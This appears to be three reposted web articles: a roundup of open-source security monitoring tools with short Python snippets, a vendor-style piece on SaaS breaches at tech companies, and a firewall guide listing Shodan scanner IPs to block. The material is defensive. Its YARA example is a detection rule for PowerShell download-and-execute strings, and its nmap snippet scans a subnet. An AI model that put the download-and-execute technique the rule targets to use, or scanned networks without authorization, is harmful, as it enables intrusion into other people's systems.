Top 20 Open Source Cyber Security Monitoring Tools in 2023

As cyber threats continue to evolve, security professionals require reliable tools to defend against security vulnerabilities, protect sensitive data, and maintain network security. Open source cyber security tools provide a cost-effective way for individuals and organizations to combat these threats on-premises, in the cloud, and on mobile devices. Let’s consider the top 20 open-source cyber security monitoring tools in 2023 that help ensure continuous network and system performance monitoring.

What are the Top Cybersecurity Threats Today?

As cyber threats continue to evolve and become more sophisticated, organizations must stay informed and prepared to defend against a wide range of security risks.

Here are the top cybersecurity threats that businesses and individuals should be aware of today:

1. Phishing Attacks: Phishing attacks are a prevalent form of social engineering where cybercriminals use deceptive emails or websites to trick users into revealing sensitive information or installing malware. These attacks often target login credentials, financial information, and other personal data.

2. Ransomware: Ransomware is a type of malicious software that encrypts a victim’s files or locks their systems, demanding a ransom payment to restore access. Ransomware attacks can cause significant financial losses and operational disruptions for organizations.

3. Insider Threats: Insider threats refer to security risks posed by employees, contractors, or other individuals with authorized access to an organization’s systems and data. These threats can result from malicious intent or negligence, leading to data breaches or system compromises.

4. Supply Chain Attacks: Also known as third-party attacks or vendor risk, supply chain attacks target an organization’s suppliers, vendors, or partners to gain access to their systems and data. These attacks often exploit security vulnerabilities in the supply chain to compromise multiple organizations.

5. Distributed Denial of Service (DDoS) Attacks: DDoS attacks involve overwhelming a target’s network or system with a flood of traffic, rendering it inaccessible to legitimate users. DDoS attacks can cause severe downtime and service disruptions.

6. Advanced Persistent Threats (APTs): APTs are sophisticated, coordinated cyberattacks by well-funded threat actors or nation-state groups that target specific organizations for espionage, data theft, or sabotage. APTs often use advanced techniques and tactics to evade detection and maintain a long-term presence within a target’s network.

7. Zero-Day Exploits: Zero-day exploits are attacks that take advantage of previously unknown security vulnerabilities in software or systems. These vulnerabilities, also known as zero-day flaws, have no existing patches or fixes, making them particularly dangerous and challenging to defend against.

8. Internet of Things (IoT) Security: The increasing adoption of IoT devices and connected technologies has expanded the attack surface for cybercriminals. IoT devices are often vulnerable to cyber threats due to weak security measures, creating new risks for organizations and consumers.

9. Data Breaches: Data breaches occur when unauthorized individuals gain access to an organization’s sensitive data, such as customer information, financial records, or intellectual property. Data breaches can result in significant financial and reputational damage for organizations.

10. Cloud Security Threats: As more organizations migrate to cloud-based services, cloud security has become a critical concern. Threats in the cloud can arise from misconfigurations, weak authentication mechanisms, and vulnerabilities in cloud applications or infrastructure.

Benefits of Open-Source Cybersecurity Tools

Open source cyber security monitoring tools offer numerous advantages over proprietary solutions, making them an attractive option for businesses, organizations, and individuals looking to enhance their security posture and perform effective security testing.

Here are some key benefits of using open-source tools for cyber security monitoring, even if you already run another network monitoring system. Proper cybersecurity monitoring and access management are key to maintaining a secure environment.

Cost-Effectiveness

One of the most significant benefits of open-source cyber security tools is their cost-effectiveness. With no licensing fees or subscription costs, these free tools enable security teams to access powerful network monitoring solutions without breaking the bank.

This particularly benefits small businesses and startups with limited budgets, allowing them to allocate resources to other critical areas.

Customizability and Flexibility

Open-source network monitoring tools offer high customizability and flexibility, allowing security professionals to tailor the tools to their specific needs. This adaptability enables organizations to address unique security threats and vulnerabilities, ensuring a more robust security posture.

Additionally, the ability to integrate these tools with existing security infrastructure adds an extra layer of protection to network security.

Rapid Development and Updates

The open-source community is known for its rapid development and frequent updates. As new security threats and vulnerabilities emerge, open-source cyber security tools are often among the first to receive patches and updates.

This continuous monitoring and proactive response help organizations stay ahead of potential security risks and maintain a strong security posture.

Extensive Support and Collaboration

Open-source cyber security tools benefit from an extensive support network, comprising developers, users, and experts from around the world.

This collaborative environment fosters knowledge sharing, allowing security professionals to learn from one another and develop more effective security strategies.

Additionally, the availability of comprehensive documentation and online forums makes it easier for users to troubleshoot issues and enhance their understanding of network monitoring and security.

Improved Security and Transparency

With their source code openly available for inspection, open-source cyber security tools offer greater transparency than proprietary alternatives. This transparency allows security professionals and researchers to scrutinize the code for potential security vulnerabilities and ensure its integrity.

Moreover, the collaborative nature of the open-source community means that any identified issues are addressed quickly, further enhancing the overall security of these tools.

Platform Independence and Interoperability

Open-source network monitoring software often supports a wide range of operating systems, including Windows, macOS, and Linux, allowing organizations to deploy these tools across diverse environments.

This platform independence and interoperability help organizations ensure comprehensive network monitoring, regardless of the underlying infrastructure.

Top 20 Open Source Cyber Security Monitoring Tools in 2023

Note the following free cyber security monitoring tools in 2023 — an open-source list of solutions you can take advantage of, with no free trial needed.

1. Wireshark: Network Protocol Analyzer

Wireshark is a widely used network protocol analyzer that enables security teams to troubleshoot, analyze, and monitor network traffic in real time to detect security issues. It is the de facto standard network monitoring tool.

By dissecting network protocols, Wireshark provides valuable insights into potential security risks and network vulnerabilities, allowing professionals to identify and resolve issues efficiently.

You can monitor a wide range of protocols, including TCP/IP, SNMP (Simple Network Management Protocol), FTP, and many others. If you are looking for a network monitor, this is it.
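
For a flavor of what protocol-level inspection looks like in practice, here is a minimal sketch using pyshark, a third-party Python wrapper around Wireshark’s tshark; the capture file name and fields are illustrative assumptions.

```python
# Minimal sketch using pyshark (pip install pyshark), a wrapper
# around Wireshark's tshark. The pcap name is hypothetical.
import pyshark

capture = pyshark.FileCapture("traffic.pcap", display_filter="dns")

for packet in capture:
    # Field access mirrors Wireshark's dissector tree; adjust
    # the fields to the protocol you are interested in.
    print(packet.ip.src, "->", packet.ip.dst, packet.dns.qry_name)

capture.close()
```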

2. Snort: Network Intrusion Detection and Prevention System

Snort is a powerful open-source intrusion detection and prevention system (IDPS) that monitors network traffic and detects potential security threats.

It provides real-time traffic analysis, packet logging, and alerting capabilities, making it an essential tool for security auditing and network monitoring.
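
Snort’s detection logic lives in a plain-text rule language. As a rough illustration (kept in Python for consistency with the other sketches in this post), the snippet below appends one classic example rule to a local rules file; the path is an assumption and will vary by install.

```python
# A minimal sketch (assumed Snort paths; adjust for your install):
# append one classic example rule to local.rules.
rule = (
    'alert icmp any any -> $HOME_NET any '
    '(msg:"ICMP ping detected"; sid:1000001; rev:1;)'
)

# Rule anatomy: action (alert), protocol (icmp), source -> destination,
# then options in parentheses (message, unique signature ID, revision).
with open("/etc/snort/rules/local.rules", "a") as f:
    f.write(rule + "\n")
```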

3. OSSEC: Host-Based Intrusion Detection System

OSSEC is a comprehensive host-based intrusion detection system (HIDS) that offers log analysis, file integrity checking, rootkit detection, and more.

It supports various operating systems, including Linux, Windows, and macOS, and helps security professionals monitor hosts and analyze logs for potential security vulnerabilities.

4. Security Onion: Intrusion Detection and Network Security Monitoring Distribution

Security Onion is a Linux distribution specifically designed for intrusion detection, network security monitoring, and log management.

With a suite of powerful open-source tools, including Snort, Suricata, and Zeek, Security Onion provides a robust solution for security teams to monitor networks and detect security breaches.

5. Nmap: Network Scanning and Discovery Tool

Nmap is a versatile network scanning and discovery tool that helps security professionals identify network devices, open ports, and running services.

It is essential network monitoring software for vulnerability management, penetration testing, and network inventory management.
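
As a quick illustration, here is a hedged sketch using the third-party python-nmap wrapper around the Nmap binary; the target range and arguments are examples, and you should only scan networks you are authorized to test.

```python
# Minimal sketch using python-nmap (pip install python-nmap),
# which shells out to the nmap binary. Example target range only.
import nmap

scanner = nmap.PortScanner()
scanner.scan(hosts="192.168.1.0/24", arguments="-sV --top-ports 50")

for host in scanner.all_hosts():
    print(host, scanner[host].state())
    # Walk discovered TCP ports and their service names, if any.
    for port, info in scanner[host].get("tcp", {}).items():
        print(f"  {port}/tcp {info['state']} {info.get('name', '')}")
```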

6. Kismet: Wireless Network Detector, Sniffer, and Intrusion Detection System

Kismet is a Wi-Fi security tool that detects, sniffs, and analyzes wireless networks. By monitoring wireless network traffic, Kismet identifies potential security risks, network vulnerabilities, and unauthorized users, making it an invaluable tool for wireless network security.

7. Suricata: High-Performance Network Intrusion Detection and Prevention Engine

Suricata is an open-source, high-performance network intrusion detection and prevention engine that provides real-time network traffic analysis, threat detection, and alerting.

Suricata enables security professionals to maintain network integrity and security by employing advanced threat defense and anomaly detection techniques.

8. Zeek (formerly Bro): Network Analysis Framework for Security Monitoring

Zeek, previously known as Bro, is a powerful network analysis framework that offers real-time insight into network traffic.

With its flexible scripting language and extensible plugin architecture, Zeek provides comprehensive visibility into network activity, enabling security teams to detect and prevent security threats.

9. OpenVAS: Vulnerability Scanning and Management Solution

OpenVAS is a comprehensive vulnerability scanning and management solution that helps security professionals identify, assess, and remediate security vulnerabilities.

With its extensive plugin library, OpenVAS ensures continuous monitoring and up-to-date vulnerability information, making it a critical tool for vulnerability management.

10. ClamAV: Open-Source Antivirus Engine

ClamAV is an open-source antivirus engine that detects trojans, viruses, and other malicious software.

It offers a command-line scanner, a graphical user interface (GUI) for the Windows operating system, and integration with mail servers, ensuring that your systems are protected from security threats.

11. Fail2Ban: Log-Parsing Application to Protect Against Brute-Force Attacks

Fail2Ban is a log-parsing application that monitors log files for malicious activity, such as repeated failed login attempts. Fail2Ban bans the offending IP address when a potential attack is detected, effectively protecting your network from brute-force attacks and unauthorized access.
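
Fail2Ban’s configuration lives in its own jail files, but the core idea is easy to sketch: parse an auth log, count failures per source IP, and ban repeat offenders. The toy sketch below is not Fail2Ban itself; the Debian-style log path and the threshold of five attempts are assumptions.

```python
# Toy sketch of Fail2Ban's core log-parsing idea: count failed SSH
# logins per source IP and print a ban command over a threshold.
import re
from collections import Counter

FAILED = re.compile(r"Failed password .* from (\d+\.\d+\.\d+\.\d+)")
failures = Counter()

with open("/var/log/auth.log") as log:
    for line in log:
        match = FAILED.search(line)
        if match:
            failures[match.group(1)] += 1

for ip, count in failures.items():
    if count >= 5:  # analogue of Fail2Ban's "maxretry" setting
        print(f"iptables -I INPUT -s {ip} -j DROP  # {count} failures")
```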

12. AlienVault OSSIM: Open-Source Security Information and Event Management Platform

AlienVault OSSIM is an open-source security information and event management (SIEM) platform that provides real-time event correlation, log analysis, and threat intelligence.

By integrating multiple security tools, OSSIM gives security teams a unified view of their environment and helps enhance their overall security posture.

13. Cuckoo Sandbox: Automated Malware Analysis System

Cuckoo Sandbox is an open-source automated malware analysis system that enables security professionals to analyze suspicious files and URLs in a safe, isolated environment.

It provides detailed reports on malware behavior, including network traffic analysis, file system changes, and API traces, helping security teams identify and mitigate security risks.

14. Logstash: Log Processing and Management Tool

Logstash is part of the Elastic Stack (ELK Stack) and offers log processing and management capabilities.

It collects, parses, and stores log data from various sources, making it an essential tool for security professionals to monitor and analyze network activity, detect security breaches, and maintain system performance.

15. pfSense: Open-Source Firewall and Router Distribution

pfSense is an open-source firewall and router distribution based on FreeBSD. It offers a powerful, flexible solution for network security, traffic shaping, and VPN connectivity.

With its extensive features and customization options, pfSense is ideal for securing web servers and internal networks.

16. ModSecurity: Open-Source Web Application Firewall

ModSecurity is an open-source web application firewall (WAF) providing real-time security monitoring and access control. It detects and prevents web attacks, protects sensitive data, and helps security professionals maintain compliance with industry standards and regulations.

17. AIDE (Advanced Intrusion Detection Environment): File and Directory Integrity Checker

AIDE is a file and directory integrity checker that monitors system files for unauthorized changes. It detects modifications, deletions, and additions, allowing security teams to maintain system integrity and prevent security breaches.
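
The mechanism behind integrity checkers like AIDE is straightforward to sketch: hash every file into a trusted baseline, then re-hash later and diff. The toy example below is not AIDE itself; the /etc target and baseline file name are assumptions, and it needs read access to the tree it checks.

```python
# Toy sketch of the file-integrity idea behind AIDE: build a
# SHA-256 baseline of a tree, then compare later runs against it.
import hashlib
import json
import os
import sys

def snapshot(root):
    hashes = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as f:
                    hashes[path] = hashlib.sha256(f.read()).hexdigest()
            except OSError:
                pass  # unreadable file; real tools record this too
    return hashes

if sys.argv[1] == "init":  # build the trusted baseline once
    with open("baseline.json", "w") as f:
        json.dump(snapshot("/etc"), f)
else:  # later runs: report modifications, deletions, additions
    with open("baseline.json") as f:
        old = json.load(f)
    new = snapshot("/etc")
    for path in sorted(old.keys() | new.keys()):
        if old.get(path) != new.get(path):
            print("CHANGED:", path)
```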

18. Graylog: Open-Source Log Management Platform

Graylog is an open-source log management platform that centralizes and analyzes log data from various sources.

Graylog helps security professionals detect security threats, identify network vulnerabilities, and maintain network security by providing comprehensive visibility into network activity.

19. Wazuh: Security Monitoring and Compliance Solution

Wazuh is a free, open-source security monitoring and compliance solution that integrates host-based and network-based intrusion detection systems, file integrity monitoring and security policy enforcement.

Wazuh’s centralized management and powerful analytics capabilities make it an essential tool for security teams to detect and respond to security threats.

20. T-Pot: Honeypot Platform

T-Pot is a platform combining multiple honeypots into a single, easy-to-deploy solution for cyber security monitoring. By simulating vulnerable systems and services, T-Pot attracts attackers and collects threat data, providing valuable insights into current attack trends and techniques.

Honorable mentions

Samhain: Host-Based Intrusion Detection System

Samhain is a host-based intrusion detection system (HIDS) that provides file integrity checking and log file monitoring. It detects unauthorized modifications, deletions, and additions, helping security professionals maintain system integrity and prevent security breaches.

SELKS: Network Security Management ISO with Suricata

SELKS is a live and installable network security management ISO based on Debian, focusing on a complete and ready-to-use Suricata IDS/IPS ecosystem. It offers a user-friendly interface and powerful analytics tools, making it an ideal choice for security teams to monitor networks and detect potential security threats.

Squid: Open-Source Web Proxy Cache and Forward Proxy

Squid is an open-source web proxy cache and forward proxy that improves web performance and security. By caching frequently-requested web content and filtering web traffic, Squid helps reduce bandwidth usage, enhance user privacy, and protect against web-based security threats.

YARA: Pattern-Matching Tool for Malware Researchers

YARA is a pattern-matching tool designed for malware researchers to identify and classify malware samples. By creating custom rules and signatures, YARA enables security professionals to detect and analyze malicious software, enhancing their understanding of current malware trends and techniques.
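
For a taste of the rule language, here is a minimal sketch using the yara-python bindings; the rule and the scanned file name are illustrative examples.

```python
# Minimal sketch using yara-python (pip install yara-python).
# The rule and target file are examples, not real detections.
import yara

rule_source = r"""
rule SuspiciousPowerShell
{
    strings:
        $a = "Invoke-Expression" nocase
        $b = "DownloadString" nocase
    condition:
        all of them
}
"""

rules = yara.compile(source=rule_source)
for match in rules.match(filepath="sample.bin"):
    print(match.rule, match.strings)
```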

Arkime (formerly Moloch): Large-Scale, Open-Source, Indexed Packet Capture and Search System

Arkime is a large-scale, open-source, indexed packet capture and search system that provides comprehensive visibility into network traffic. It enables security professionals to analyze network protocols, detect security vulnerabilities, and identify potential security threats, making it an essential tool for network monitoring and security auditing.

Tips to Improve Your Cybersecurity Posture

Improving your cybersecurity posture is essential for safeguarding your organization from various cyber threats. Here are some practical tips to help enhance your cybersecurity defenses:

  1. Implement Regular Security Audits: Conducting routine security audits can help identify potential weaknesses in your organization’s cybersecurity infrastructure. This includes checking for outdated software, misconfigured settings, and other vulnerabilities that may expose your systems to attacks.
  2. Keep Software and Systems Updated: Regularly update your software, operating systems, and firmware to protect against known vulnerabilities and exploits. This includes applying security patches and updates as soon as they become available.
  3. Use Strong Authentication Mechanisms: Implement multi-factor authentication (MFA) for all critical systems and applications. MFA adds an extra layer of security by requiring users to provide additional verification, such as a one-time code or biometric authentication, in addition to their password.
  4. Encrypt Sensitive Data: Encrypt sensitive data both in transit and at rest to prevent unauthorized access. This includes using secure communication protocols, such as HTTPS and TLS, and implementing encryption solutions for data storage (see the sketch after this list).
  5. Establish a Strong Password Policy: Enforce a robust password policy that requires users to create complex, unique passwords and update them regularly. Additionally, consider using a password manager to help users manage and store their passwords securely.
  6. Educate Employees on Cybersecurity Best Practices: Provide ongoing security awareness training to educate employees about common cyber threats, safe online practices, and how to recognize and report potential security incidents.
  7. Implement Network Segmentation: Divide your network into smaller segments, isolating critical systems and data from less secure areas. This can help prevent the spread of malware and limit the damage in case of a security breach.
  8. Regularly Back Up Important Data: Regularly back up essential data and store copies offsite or in the cloud. This ensures that you can quickly recover from data loss or ransomware attacks.
  9. Utilize Endpoint Security Solutions: Deploy comprehensive endpoint security solutions to protect devices connected to your network. This includes antivirus software, firewalls, intrusion detection and prevention systems, and device management tools.
  10. Monitor and Analyze Network Traffic: Use network monitoring tools to analyze network traffic, detect anomalies, and identify potential security threats. Regular monitoring can help detect and respond to security incidents more effectively.
  11. Develop a Cybersecurity Incident Response Plan: Create a detailed incident response plan outlining the steps to take in a security breach. Regularly review and update the plan, and ensure that all employees are familiar with the procedures.
  12. Collaborate with Security Professionals: Engage with cybersecurity experts or managed service providers to help develop and maintain a strong security posture. This can provide access to specialized knowledge and resources to stay up-to-date with the latest threats and best practices.
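
To make tip 4 concrete, here is a minimal sketch of encrypting data at rest with the third-party cryptography package; the payload is fake, and in practice the key belongs in a secrets manager, never alongside the data.

```python
# Minimal sketch of encryption at rest using the "cryptography"
# package (pip install cryptography). Fake payload; real keys
# must live in a secrets manager, not next to the data.
from cryptography.fernet import Fernet

key = Fernet.generate_key()           # generate and store once, securely
fernet = Fernet(key)

token = fernet.encrypt(b"customer SSN: 000-00-0000")
print(token)                          # ciphertext, safe to write to disk

plaintext = fernet.decrypt(token)     # recovery requires the key
print(plaintext)
```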

Frequently Asked Questions (FAQs)

1. What are the best open-source cyber security monitoring tools available in 2023?

This blog post covers the top 20 open-source cyber security monitoring tools in 2023, including Wireshark, Snort, OSSEC, Security Onion, Nmap, Kismet, Suricata, Zeek, OpenVAS, ClamAV, and more.

These tools provide comprehensive network monitoring, threat detection, and vulnerability management capabilities to help organizations maintain a robust security posture.

2. Why choose open-source cyber security monitoring tools over proprietary alternatives?

Open-source cyber security monitoring tools offer several advantages: cost-effectiveness, customizability, rapid development and updates, extensive support, improved security, and platform independence.

These benefits make open-source tools attractive for organizations looking to enhance their network security and protect sensitive data.

3. How can I improve my organization’s cybersecurity hygiene?

In addition to utilizing open-source cyber security monitoring tools, organizations can improve their cybersecurity hygiene by implementing security awareness training, regularly updating software and systems, employing strong password policies, using multi-factor authentication, monitoring network traffic, and conducting regular security audits and penetration testing.

4. What is the importance of continuous monitoring in cybersecurity?

Continuous monitoring plays a crucial role in identifying and addressing security threats and vulnerabilities in real-time.

By regularly analyzing network traffic, security professionals can detect potential issues, respond to incidents promptly, and ensure the safety and integrity of their digital assets.

5. How can I protect my web applications from security threats?

Web application security can be improved by using tools such as ModSecurity, an open-source web application firewall (WAF) that provides real-time application security monitoring and access control.

Regularly updating web applications, conducting vulnerability assessments, and implementing secure coding practices can also help mitigate security risks.

6. What role do threat intelligence and threat data play in cybersecurity?

Threat intelligence and threat data help security professionals understand the latest trends, tactics, and techniques cybercriminals use.

Organizations can proactively address potential issues and maintain a strong security posture by staying informed about emerging threats and vulnerabilities.

7. Are open-source cyber security monitoring tools suitable for small businesses and startups?

Yes, open-source cyber security monitoring tools are ideal for small businesses and startups, as they offer cost-effective and powerful network monitoring solutions.

These tools enable organizations with limited budgets to access advanced security features without incurring high licensing fees or subscription costs.

Wrapping up

The ever-evolving landscape of cyber threats demands reliable and effective tools for security professionals to protect networks, systems, and sensitive data.

These top 20 open-source cyber security monitoring tools for 2023 provide comprehensive network monitoring, threat detection, and vulnerability management capabilities.

By incorporating these tools into your security strategy, you can enhance your overall security posture and ensure the safety and integrity of your digital assets.

Source :
https://www.virtualizationhowto.com/2023/05/top-20-open-source-cyber-security-monitoring-tools-in-2023/

Why High Tech Companies Struggle with SaaS Security

It’s easy to think high-tech companies have a security advantage over other older, more mature industries. Most are unburdened by 40 years of legacy systems and software. They draw some of the world’s youngest, brightest digital natives to their ranks, all of whom have been immersed in cybersecurity issues their entire lives.

Perhaps it is this very familiarity with technology that causes them to overlook SaaS security configurations. During the last Christmas holiday season, Slack had some private code stolen from its GitHub repository. According to Slack, the stolen code didn’t impact production, and no customer data was taken.

Still, the breach should serve as a warning sign to other tech companies. Stolen tokens allowed threat actors to access the GitHub instance and download the code. If this type of attack can happen to Slack on GitHub, it can happen to any high-tech company. Tech companies must take SaaS security seriously to prevent resources from leaking or being stolen.

App Breaches: A Recurring Story

Slack’s misfortune with GitHub wasn’t the first time a GitHub breach occurred. Back in April, OAuth tokens issued to Heroku and Travis CI were stolen and abused, leading to attackers downloading data from dozens of private code repositories.

MailChimp, a SaaS app used to manage email campaigns, experienced three breaches over 12 months spanning 2022-23. Customer data was stolen by threat actors, who used that data in attacks against cryptocurrency companies.

SevenRooms had over 400 GB of sensitive data stolen from its CRM platform, PayPal notified customers in January that unauthorized parties accessed accounts using stolen login credentials, and Atlassian saw employee data and corporate data exposed in a February breach.

Clearly, tech companies aren’t immune to data breaches. Protecting their proprietary code, customer data, and employee records that are stored within SaaS applications should be a top priority.

Reliance on SaaS Applications

A strong SaaS posture is important for any company, but it is particularly important for organizations that store their proprietary code in SaaS applications. This code is especially tempting to threat actors, who would like nothing more than to monetize their efforts and ransom the code back to its creators.

Tech companies also tend to rely on a large number and mix of SaaS applications, from collaboration platforms to sales and marketing tools, legal and finance, data warehouses, cybersecurity solutions, and many more – making it even more challenging to secure the entire stack.

Tech employees heavily depend on SaaS apps to do their day-to-day work; this requires security teams to strictly govern identities and their access. Moreover, these users tend to log into their SaaS apps through different devices to maintain efficiency, which may pose a risk to the organization based on the device’s level of hygiene. On top of this, tech employees tend to connect third-party applications to the core stack without thinking twice, granting these apps high-risk scopes.

Learn how Adaptive Shield can help you secure your entire SaaS stack.

Controlling SaaS Access After Layoffs

The high-tech industry is known for periods of hyper-growth, followed by downsizing. Over the past few months, we’ve seen Facebook, Google, Amazon, Microsoft, LinkedIn, Shopify and others announce layoffs.

Deprovisioning employees from SaaS applications is a critical element in data security. While much of the offboarding of employees is automated, SaaS applications that are not connected to the company directory don’t automatically revoke access. Even those applications that are connected may have admin accounts that are outside the company’s SSO. While the primary SSO account may be disconnected, the user’s admin access through the app’s login screen is often accessible.

Organic Hyper Growth and M&As

At the same time, the industry is rife with mergers and acquisition announcements. As a result of M&As, the acquiring company needs to create a baseline for SaaS security and monitor all SaaS stacks of merged or acquired companies, while enabling business continuity. Whether the hyper growth is organic or through an M&A, organizations need to be able to ensure access is right-sized for their users, at scale and rapidly.

Identity Threat Detection & Response

The majority of data breaches impacting tech companies stem from stolen credentials and tokens. The threat actor enters the system through the front door, using valid credentials of the user.

Identity Threat Detection and Response (ITDR) picks up suspicious events that would otherwise go unnoticed. An SSPM (SaaS Security Posture Management) solution with threat detection engines in place will alert when there is an Indicator of Compromise (IOC). These IOCs are based on cross-referencing activities such as user geolocation, time, frequency, recurring login attempts, excessive activities, and more.
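
As a toy illustration of that cross-referencing idea (not any vendor’s actual detection logic), the sketch below scores a login event on geolocation, hour of day, and recent failed attempts; the fields and thresholds are assumptions.

```python
# Toy IOC scoring sketch: cross-reference several weak signals on
# a login event. All fields and thresholds are illustrative.
USUAL_COUNTRIES = {"US", "DE"}

def risk_score(event):
    score = 0
    if event["country"] not in USUAL_COUNTRIES:
        score += 2                      # unfamiliar geolocation
    if not 6 <= event["hour"] <= 22:
        score += 1                      # activity at odd hours
    if event["failed_attempts_last_hour"] >= 5:
        score += 3                      # recurring login attempts
    return score

event = {"country": "RO", "hour": 3, "failed_attempts_last_hour": 7}
if risk_score(event) >= 4:
    print("Indicator of Compromise: flag this identity for review")
```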

Securing High Tech’s SaaS

Maintaining a high SaaS security posture is challenging for high tech companies, who may mistakenly believe they are equipped and well trained to prevent SaaS attacks. SaaS Security Posture Management is essential to preventing SaaS breaches, while an SSPM with ITDR capabilities will go a long way toward ensuring that your SaaS data is secure.

Source :
https://thehackernews.com/2023/05/why-high-tech-companies-struggle-with.html

How to block Shodan scanners

Shodan is a search engine which does not index web sites or web content, but vulnerable devices on the internet. To build this index and keep it up to date, Shodan uses at least 16 scanners with different AS numbers and different physical locations.

In case you want to block those scanners, this guide might help.

Set up host definitions

First, set up host definitions in the firewall menu and put in the following hosts (it might be useful to put in the rDNS name as a hostname):

Known Shodan scanners (last updated 2022-02-16)

| rDNS name | IP address | Location |
| --- | --- | --- |
| shodan.io (unclear if this is a scanner IP) | 208.180.20.97 | US |
| census1.shodan.io | 198.20.69.74 | US |
| census2.shodan.io | 198.20.69.98 | US |
| census3.shodan.io | 198.20.70.114 | US |
| census4.shodan.io | 198.20.99.130 | NL |
| census5.shodan.io | 93.120.27.62 | RO |
| census6.shodan.io | 66.240.236.119 | US |
| census7.shodan.io | 71.6.135.131 | US |
| census8.shodan.io | 66.240.192.138 | US |
| census9.shodan.io | 71.6.167.142 | US |
| census10.shodan.io | 82.221.105.6 | IS |
| census11.shodan.io | 82.221.105.7 | IS |
| census12.shodan.io | 71.6.165.200 | US |
| atlantic.census.shodan.io | 188.138.9.50 | DE |
| pacific.census.shodan.io | 85.25.103.50 | DE |
| rim.census.shodan.io | 85.25.43.94 | DE |
| pirate.census.shodan.io | 71.6.146.185 | US |
| ninja.census.shodan.io | 71.6.158.166 | US |
| border.census.shodan.io | 198.20.87.98 | US |
| burger.census.shodan.io | 66.240.219.146 | US |
| atlantic.dns.shodan.io | 209.126.110.38 | US |
| blog.shodan.io (unclear if this is a scanner IP) | 104.236.198.48 | US |
| hello.data.shodan.io | 104.131.0.69 | US |
| www.shodan.io (unclear if this is a scanner IP) | 162.159.244.38 | US |

The following additional entries were added in September 2019:

| rDNS name | IP address | Location |
| --- | --- | --- |
| battery.census.shodan.io | 93.174.95.106 | SC |
| cloud.census.shodan.io | 94.102.49.193 | SC |
| dojo.census.shodan.io | 80.82.77.139 | SC |
| flower.census.shodan.io (PTR only) | 94.102.49.190 | SC |
| goldfish.census.shodan.io | 185.163.109.66 | RO |
| house.census.shodan.io | 89.248.172.16 | SC |
| inspire.census.shodan.io (PTR only) | 71.6.146.186 | US |
| mason.census.shodan.io | 89.248.167.131 | SC |
| ny.private.shodan.io | 159.203.176.62 | US |
| turtle.census.shodan.io (PTR only) | 185.181.102.18 | RO |
| sky.census.shodan.io | 80.82.77.33 | SC |
| shodan.io (PTR only) | 216.117.2.180 | US |

The following additional entries were added in February 2022:

| rDNS name | IP address | Location |
| --- | --- | --- |
| einstein.census.shodan.io | 71.6.199.23 | US |
| hat.census.shodan.io | 185.142.236.34 | NL |
| red.census.shodan.io | 185.165.190.34 | US |
| soda.census.shodan.io | 71.6.135.131 | US |
| wine.census.shodan.io | 185.142.236.35 | NL |

The following additional entries were added on 21 September 2022:

| rDNS name | IP address | Location |
| --- | --- | --- |
| wall.census.shodan.io | 66.240.219.133 | US |
| floss.census.shodan.io | 143.198.225.197 | US |
| dog.census.shodan.io | 137.184.95.216 | US |
| draft.census.shodan.io | 64.227.90.185 | US |
| can.census.shodan.io | 143.198.238.87 | US |
| pack.census.shodan.io | 137.184.190.205 | US |
| jug.census.shodan.io | 137.184.112.192 | US |
| elk.census.shodan.io | 137.184.190.188 | US |
| tab.census.shodan.io | 167.172.219.157 | US |
| buffet.census.shodan.io | 143.110.239.2 | US |
| deer.census.shodan.io | 143.198.68.20 | US |

The following additional entries were added on 30 September 2022:

| rDNS name | IP address | Location |
| --- | --- | --- |
| sparkle.census.shodan.io | 137.184.190.194 | US |
| fish.census.shodan.io | 137.184.190.246 | US |
| heimdal.scan6x.shodan.io (PTR only) | 137.184.9.17 | US |
| gravy.scanf.shodan.io (PTR only) | 137.184.13.100 | US |
| scanme.scanf.shodan.io (PTR only) | 137.184.94.133 | US |
| frame.census.shodan.io (PTR only) | 137.184.112.103 | US |
| collector.chrono.shodan.io (PTR only) | 137.184.180.190 | US |
| ships.data.shodan.io | 143.198.50.234 | US |

The following additional entries were also added on 30 September 2022. These were obtained by taking the IP addresses above and scanning any /16 subnet containing more than one of them; they have not necessarily been seen scanning. Note that the same rDNS record can be returned by multiple IPs:

| rDNS name | IP address | Location |
| --- | --- | --- |
| green.census.shodan.io | 185.142.236.36 | NL |
| blue.census.shodan.io | 185.142.236.40 | NL |
| guitar.census.shodan.io | 185.142.236.41 | NL |
| blue2.census.shodan.io | 185.142.236.43 | NL |
| red2.census.shodan.io | 185.142.239.16 | NL |
| census2.shodan.io | 198.20.69.96/29 | US |
| census3.shodan.io | 198.20.70.112/29 | US |
| border.census.shodan.io | 198.20.87.96/29 | US |
| census4.shodan.io | 198.20.99.128/29 | NL |
| malware-hunter.census.shodan.io | 66.240.205.34 | US |
| refrigerator.census.shodan.io | 71.6.146.130 | US |
| board.census.shodan.io | 71.6.147.198 | US |
| tesla.census.shodan.io | 71.6.147.254 | US |
| thor.data.shodan.io | 71.6.150.153 | US |
| grimace.data.shodan.io | 71.6.167.125 | US |
| house.census.shodan.io | 89.248.172.7 | NL |

Sources: own research, log reviews.

Contributor Note!
If you already DROP the ranges that belonged to the notorious “AS29073 Quasi Networks LTD”, you are already banning the “SC” (Seychelles) sources detailed above; those ranges have been inherited by AS202425. “AS9009 M247 Ltd” accounts for most of the “RO” (Romania) sources; further, M247 (AS9009) seems to be the exit point for most NordVPN/PureVPN and many low-cost script-kiddie VPNs. Firewalling them is useful for quietness. Interactions between Shodan and M247 seem to be very close.

You might add a comment to each host, such as “scanner” or “shodan” to make clear why you added those.

It is possible to block other common scanners here, too. However, please keep in mind that this isn’t a technique which is very scalable. Please consider running an IPS, if possible.

Project 25499 scanners (last updated 2016-02-28)

| rDNS name | IP address | Location |
| --- | --- | --- |
| scanner01.project25499.com | 98.143.148.107 | US |
| scanner02.project25499.com | 155.94.254.133 | US |
| scanner03.project25499.com | 155.94.254.143 | US |
| scanner04.project25499.com | 155.94.222.12 | US |
| scanner05.project25499.com | 98.143.148.135 | US |

Source: http://project25499.com/

Set up firewall group

Second, set up a firewall group and add all those host entries to it. Add a title and a comment to this firewall group. In this guide, we assume you have named the group “shodanscanners”.

Set up firewall rule

Third, create a new firewall rule. Set the “shodanscanners” group as source. For destination, use “standard networks” and set this to “any”. Set “rule action” to “drop”.

The setting “reject” is not recommended here, since the firewall would send an ICMP status message to the host(s) which triggered the firewall rule. By this, the host knows that there is something which at least sends ICMP errors back. To avoid this, “drop” is preferable: the network packets are dropped silently, and there is no way of telling (without additional scans) whether the target IP address is simply down or drops network packets.
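
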